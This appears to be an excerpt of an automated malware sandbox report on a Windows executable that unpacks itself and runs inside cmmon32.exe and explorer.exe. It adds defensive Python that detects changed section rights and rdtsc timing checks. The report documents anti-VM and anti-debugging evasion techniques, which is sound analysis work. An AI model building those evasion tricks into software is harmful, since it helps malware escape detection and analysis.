          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: cmmon32.pdb source: UGGJ4NnzFz.exe, 00000001.00000002.274327095.0000000000930000.00000040.00000001.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: UGGJ4NnzFz.exe, 00000001.00000002.274327095.0000000000930000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: UGGJ4NnzFz.exe, 00000000.00000003.212550994.0000000009A50000.00000004.00000001.sdmp, UGGJ4NnzFz.exe, 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, cmmon32.exe, 00000009.00000002.477934562.000000000466F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: UGGJ4NnzFz.exe, cmmon32.exe

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeUnpacked PE file: 1.2.UGGJ4NnzFz.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_73752F60 push eax; ret
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00416026 push ebx; iretd
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0041C087 push dword ptr [DF0C81F8h]; ret
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00409A94 push 00D6BDC6h; iretd
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009ED0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045CD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003B6026 push ebx; iretd
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003BC087 push dword ptr [DF0C81F8h]; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003A9A94 push 00D6BDC6h; iretd
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003BB3B5 push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003BB40B push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003BB402 push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003BB46C push eax; ret
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile created: C:\Users\user\AppData\Local\Temp\nsyA3E4.tmp\System.dll
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
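          The "Detected unpacking" entry at the top of this group compares the section rights of the on-disk image with those of the dumped, unpacked image, in a compact name:flags notation. The following is an added example, not Joe Sandbox code, of how that comparison is made: a small pure-Python reader for the PE section table that emits the same kind of string, plus a diff that reports sections whose rights changed and any section that ends up both writable and executable. The two images it works on are constructed minimal PE headers built by build_pe, not the analysed sample; the flag letters E, R and W are printed in full (so a normal .data section shows as RW rather than the report's collapsed W).

```python
"""Read PE section rights and diff an on-disk image against a memory dump.
Added example; ON_DISK and DUMPED are constructed headers, not the sample."""
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def build_pe(sections):
    """Construct a minimal PE32 header carrying the given (name, characteristics)
    sections; only fields needed to locate the section table are populated."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 0xE0                                   # PE32 optional header size
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    optional = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)
    table = b""
    for i, (name, chars) in enumerate(sections):
        # IMAGE_SECTION_HEADER: Name, VirtualSize, VirtualAddress, SizeOfRawData,
        # PointerToRawData, reloc/linenumber pointers and counts, Characteristics
        table += struct.pack("<8sIIIIIIHHI", name.encode(), 0x1000, 0x1000 * (i + 1),
                             0x200, 0x400 + 0x200 * i, 0, 0, 0, 0, chars)
    return dos + b"PE\0\0" + coff + optional + table


def section_rights(data):
    """Return [(name, rights)] where rights is a subset of the letters E, R, W."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]       # NumberOfSections
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]  # SizeOfOptionalHeader
    table = e_lfanew + 24 + opt_size
    out = []
    for i in range(nsec):
        name, chars = struct.unpack_from("<8s28xI", data, table + 40 * i)
        rights = "".join(l for flag, l in ((IMAGE_SCN_MEM_EXECUTE, "E"),
                                           (IMAGE_SCN_MEM_READ, "R"),
                                           (IMAGE_SCN_MEM_WRITE, "W")) if chars & flag)
        out.append((name.rstrip(b"\0").decode(), rights))
    return out


def format_rights(data):
    """Report-style summary, e.g. '.text:ER;.rdata:R;.data:RW;'."""
    return "".join(f"{n}:{r};" for n, r in section_rights(data))


def compare_rights(on_disk, dumped):
    """Sections whose rights differ between the images, and sections that are
    writable and executable in the dump (code written at run time)."""
    before, after = dict(section_rights(on_disk)), dict(section_rights(dumped))
    changed = {n: (before.get(n), after.get(n))
               for n in sorted(set(before) | set(after)) if before.get(n) != after.get(n)}
    wx = [n for n, r in after.items() if "W" in r and "E" in r]
    return changed, wx


# Constructed images: normal layout on disk; in the dump .text has become writable.
ON_DISK = build_pe([
    (".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (".rdata", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
    (".data", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
])
DUMPED = build_pe([
    (".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
              | IMAGE_SCN_MEM_WRITE),
    (".rdata", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
    (".data", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
])

if __name__ == "__main__":
    print("disk:", format_rights(ON_DISK))
    print("dump:", format_rights(DUMPED))
    print("diff:", compare_rights(ON_DISK, DUMPED))
```

On a real dump the header characteristics may not have been rewritten even though the pages were made writable with VirtualProtect, so a dump-versus-disk header diff is a useful but not sufficient check; comparing the page protections recorded at dump time against the section flags is the stronger test.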

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 00000000003A85E4 second address: 00000000003A85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 00000000003A897E second address: 00000000003A8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
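          The interceptor entries above record the classic timing check: two rdtsc reads six bytes apart with only register arithmetic between them, so a large delta (the cost of a hypervisor exit or a debugger single-step) reveals an instrumented environment. The same code also reads the PEB through fs:[30h] at many sites, as the "mov eax, dword ptr fs:[00000030h]" entries later in this group show. The following is an added static-triage example, not Joe Sandbox code: it scans a code buffer for rdtsc pairs within a short window and for fs:[30h] reads, and reports their addresses. The buffer is constructed (the report's instruction sequence with filler around it) and the base address is chosen so the first pair lands on the report's 0x4085E4 / 0x4085EA; neither is taken from the sample's bytes.

```python
"""Find rdtsc timing pairs and fs:[30h] PEB reads in raw x86 code bytes.
Added example; SAMPLE and BASE are constructed, not the sample's own bytes."""
import re

RDTSC_RE = re.compile(rb"\x0f\x31")
# mov eax, fs:[30h]  -> 64 A1 30 00 00 00
# mov r32, fs:[30h]  -> 64 8B <modrm mod=00 rm=101> 30 00 00 00
PEB_READ_RE = re.compile(
    rb"\x64(?:\xa1|\x8b[\x05\x0d\x15\x1d\x25\x2d\x35\x3d])\x30\x00\x00\x00")


def find_rdtsc_pairs(code, base=0, max_gap=16):
    """Pairs of consecutive rdtsc instructions no more than max_gap bytes apart,
    as (first_address, second_address) tuples."""
    offs = [m.start() for m in RDTSC_RE.finditer(code)]
    return [(base + a, base + b) for a, b in zip(offs, offs[1:]) if 0 < b - a <= max_gap]


def find_peb_reads(code, base=0):
    """Addresses of fs:[30h] loads (PEB access used for BeingDebugged, Ldr walks)."""
    return [base + m.start() for m in PEB_READ_RE.finditer(code)]


# Constructed code buffer. Offset 12 holds the exact sequence from the report:
# rdtsc; xor ecx, ecx; add ecx, eax; rdtsc (second rdtsc at offset 18).
SAMPLE = (
    b"\x55\x8b\xec" * 4                     # push ebp; mov ebp, esp (filler)
    + b"\x0f\x31\x31\xc9\x01\xc1\x0f\x31"   # the timing pair
    + b"\x90" * 40
    + b"\x64\xa1\x30\x00\x00\x00"           # mov eax, fs:[30h]
    + b"\x8b\x40\x0c"                       # mov eax, [eax+0Ch]  (PEB->Ldr)
    + b"\x64\x8b\x0d\x30\x00\x00\x00"       # mov ecx, fs:[30h]
    + b"\x90" * 40
    + b"\x0f\x31"                           # lone rdtsc: no partner in window
)
BASE = 0x4085D8   # chosen so offset 12 maps to the report's 0x4085E4

if __name__ == "__main__":
    for a, b in find_rdtsc_pairs(SAMPLE, BASE):
        print(f"rdtsc pair at {a:#010x} / {b:#010x} (gap {b - a} bytes)")
    for a in find_peb_reads(SAMPLE, BASE):
        print(f"fs:[30h] read at {a:#010x}")
```

The byte patterns are compact enough to move straight into a YARA rule; the window check is what keeps the rdtsc part useful, since a single rdtsc in a binary is common (profiling, seeding) while two within a few bytes almost always mean a delta measurement.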
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeAPI coverage: 8.1 %
          Source: C:\Windows\SysWOW64\cmmon32.exeAPI coverage: 8.6 %
          Source: C:\Windows\explorer.exe TID: 6164Thread sleep time: -50000s >= -30000s
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 6984Thread sleep time: -44000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_0040263E FindFirstFileA,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile opened: C:\Users\user
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile opened: C:\Users\user\Desktop\UGGJ4NnzFz.exe
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile opened: C:\Users\user\AppData\Local\Temp\nsyA3E3.tmp
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile opened: C:\Users\user\Desktop\desktop.ini
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile opened: C:\Users\user\AppData\Local\Temp\dceotuvjnitpz
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile opened: C:\Users\user\AppData\Local\Temp\6jlp0t221b5inmotwb6
          Source: explorer.exe, 00000005.00000000.241512606.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.241512606.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000005.00000000.222167961.0000000001398000.00000004.00000020.sdmpBinary or memory string: War&Prod_VMware_SATAR
          Source: explorer.exe, 00000005.00000000.247174427.000000000F6E3000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.240796692.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.239093563.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.252370895.0000000001398000.00000004.00000020.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
          Source: explorer.exe, 00000005.00000000.232477567.0000000004E61000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAv
          Source: explorer.exe, 00000005.00000000.261705438.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000005.00000000.241512606.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000005.00000000.241512606.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000005.00000000.242412172.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000005.00000000.261725875.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000005.00000000.239093563.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.239093563.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.239093563.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00409B20 LdrLoadDll,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00999080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009CF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009CF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009CF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A13884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A13884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A2B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009958EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009940E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009940E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009940E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A64015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A64015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A17016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A17016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A17016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A61074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A52073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A169A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009CA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A241E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0099B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0099B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0099B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00999100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00999100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00999100 mov eax, dword ptr fs:[00000030h]
